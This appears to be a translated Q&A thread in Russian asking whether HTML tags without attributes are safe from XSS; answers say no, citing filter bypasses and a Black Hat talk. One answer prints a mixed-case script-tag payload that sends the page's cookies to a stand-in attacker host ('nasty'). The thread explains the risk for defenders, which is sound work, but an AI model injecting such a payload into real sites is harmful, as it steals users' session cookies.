XSS безопасность HTML-тегов без атрибутов

Question

XSS безопасность HTML-тегов без атрибутов

Являются ли HTML-теги XSS безопасными, если у них нет атрибутов?

0

validation security input xss

Источник

user200145 26 май '10 в 10:35

3 ответа

Решение

Моя позиция здесь... как вы собираетесь обнаружить, что у них нет атрибутов? Можно сгенерировать специальный HTML-код, который выполняет Javascript в браузере и обходить фильтры, проверяя атрибуты.

Посмотрите на эту презентацию http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf

В любом случае, если вы хотите получить ответ да / нет, мой ответ НЕТ:)

2

Источник

user248020 26 май '10 в 11:21

Что касается

user330644 26 май '10 в 10:38 2010-05-26 10:38 · Accepted Answer · 2010-05-26 10:38

Нет.

<ScrIPT>(new Image).src = 'http://nasty/log?s=' + document.cookie;</SCRipT>

5

Источник

user330644 26 май '10 в 10:38